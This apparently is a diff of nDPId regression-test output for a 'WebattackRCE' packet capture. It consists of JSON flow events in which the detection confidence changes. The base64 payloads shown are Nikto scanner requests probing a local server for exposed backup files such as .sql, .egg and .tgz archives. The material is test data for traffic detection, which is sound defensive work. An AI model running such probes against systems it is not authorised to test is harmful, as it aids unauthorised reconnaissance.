-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
